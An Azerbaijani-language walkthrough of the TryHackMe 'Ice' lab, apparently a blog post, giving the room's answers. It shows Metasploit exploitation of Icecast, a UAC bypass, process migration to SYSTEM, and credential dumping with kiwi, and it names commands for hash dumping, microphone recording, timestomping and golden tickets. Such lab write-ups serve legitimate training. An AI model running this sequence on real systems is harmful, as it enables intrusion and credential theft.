July 19, 2026
Ice | TryHackMe
Təqdim olunan İP-ni scan edirik.
By Tabrizabuzarov
3 min read
Cavab: 3389
Cavab:İcecast
Cavab: Dark-pc
Burda göstərilən linkə keçid edib exploit-in təsir qiymətini görüb yazıram
Cavab: CVE-2004–1561
Daha sonra qeyd olunduğu kimi "metasploit" işə salıram
və "search icecast" yazıram
Daha sonra use 0 yazıram
set options
set rhosts "Hədəf İP"
set lhost "Öz İP"
Cavab: exploit/windows/http/icecast_header
"RUN" yazıram
Nəyi dəyişirik ? hədəf maşının İP yazılır
Cavab: RHOSTS
Hədəf maşına daxil olandan sonra peyda olan söz nədir?
Cavab: Meterpreter
İstifadəçi adı nədir?
Cavab: Dark
ƏS versiyası nədir?
Cavab: 7601
Arxitekturası nədir?
Cavab: x64
run post/multi/recon/local_exploit_suggester yazandan sonra çıxan exploit yazıram
Cavab: exploit/windows/local/bypassuac_eventvwr
Daha sonra bir option dəyişmək lazımdır, nədir?
Cavab: LHOST
Daha sonra "getprivs" yazıram
Bunlardan hansı "administrator" icazəsi verir?
Cavab: SeTakeOwnershipPrivilege
Daha sonra "ps" yazıram
Burda "Şap növbəsi xidməti.exe" tapmalıyam
Cavab: spoolsv.exe
Daha sonra "migrate -N spoolsv.exe" yazıram
"getuid" yazıram ki görüm sistemdə kiməm?
Cavab: NT AUTHORITY\SYSTEM
Daha sonra "kiwi" tool işə salıram
Daha sonra "help" yazıram
Hansı command bütün istifadəçi məlumatları əldə edir?
Cavab: creds_all
creds_all yazıram
Və bütün şifrələr görsənir
Dark istifadəçinin şifrəsi nədir?
Cavab: Password01!
Istifadəçi şifrələrin hash-lərini hansı command ilə görə bilərəm?
Cavab: hashdump
Real vaxtda "desktop" necə görə bilərəm? Hansı command?
Cavab: screenshare
Mikrofona hansı commandla qoşula bilərəm?
Cavab: record_mic
Hanı commandla fayllarda zaman işarələrini dəyişə bilərəm?
Cavab: timestomp
Hansı commandla autentifikasiya etmədən "kerberos"dan yayınıb sistemə giriş əldə edə bilərəm?
Cavab: golden_ticket_create
Və bu qədər
Çox sağolun!
Görüşərik!